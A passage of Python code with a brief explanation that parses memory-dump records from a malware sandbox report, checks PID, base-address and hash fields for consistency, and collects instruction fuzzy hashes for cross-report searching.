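                     r"(?P<rest>(?:[0-9A-Fa-f]{8}\.){4})sdmp$")
# .jbxd name: hcaresult_<pid decimal>_<iteration>_<base address>_... (inferred from the page: 0x37 == 55)
SNAP_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<iter>\d+)_(?P<base>[0-9A-Fa-f]+)_")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")

@dataclass
class DumpRecord:
    pid: int              # from the .sdmp name (hex)
    base: int             # region base from the .sdmp name
    extra_fields: tuple   # the four undocumented trailing .sdmp fields, uninterpreted
    offset: int           # "Offset:" value on the Source File line
    based_on_pe: bool
    snapshot_pid: int     # from the .jbxd name (decimal)
    snapshot_base: int
    string_id: str
    api_string_id: str
    opcode_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str

def parse_records(text: str) -> list[DumpRecord]:
    """Split the text into records at each 'Memory Dump Source' line; other labels are ignored."""
    blocks: list[dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            blocks.append({})
        elif blocks and (m := FIELD_RE.match(line)):
            blocks[-1][m.group(1).strip()] = m.group(2).strip()
    return [_build(b) for b in blocks]

def _build(f: dict) -> DumpRecord:
    name, _, tail = f.get("Source File", "").partition(",")
    sm, om = SDMP_RE.match(name.strip()), OFFSET_RE.search(tail)
    nm = SNAP_RE.match(f.get("Snapshot File", ""))
    if not (sm and om and nm):
        raise ValueError(f"unrecognised record: {f!r}")
    return DumpRecord(
        pid=int(sm["pid"], 16), base=int(sm["base"], 16),
        extra_fields=tuple(sm["rest"].rstrip(".").split(".")),
        offset=int(om.group(1), 16), based_on_pe=(om.group(2) == "true"),
        snapshot_pid=int(nm["pid"]), snapshot_base=int(nm["base"], 16),
        string_id=f.get("String ID", ""), api_string_id=f.get("API String ID", ""),
        opcode_id=f.get("Opcode ID", ""), opcode_fuzzy=f.get("Opcode Fuzzy Hash", ""),
        instruction_fuzzy=f.get("Instruction Fuzzy Hash", ""))

def check_record(r: DumpRecord) -> list[str]:
    """Consistency problems for one record; an empty list means the record is clean."""
    problems = []
    if r.pid != r.snapshot_pid:
        problems.append(f"PID mismatch: sdmp 0x{r.pid:x} vs snapshot {r.snapshot_pid}")
    if not (r.base == r.snapshot_base == r.offset):
        problems.append("base address differs between sdmp name, snapshot name and Offset")
    if r.opcode_id != r.opcode_fuzzy:
        problems.append("Opcode ID and Opcode Fuzzy Hash differ")
    if not r.instruction_fuzzy:
        problems.append("Instruction Fuzzy Hash is empty (nothing to pivot on)")
    return problems

def pivot_hashes(records: list[DumpRecord]) -> dict[int, list[str]]:
    """Map each dumped region (by base) to its non-empty Instruction Fuzzy Hashes, the pivot values."""
    out: dict[int, list[str]] = {}
    for r in records:
        if r.instruction_fuzzy:
            out.setdefault(r.base, []).append(r.instruction_fuzzy)
    return out
```

Run `parse_records` over the report text (the indentation of the rendered page is stripped line by line), then `check_record` on each result; the first sample record reports only the empty Instruction Fuzzy Hash, the second is clean. `pivot_hashes` collects, per dumped region, the hashes to search for in other reports; a record whose hash field is empty contributes nothing and should be treated as unusable for that purpose rather than as a match.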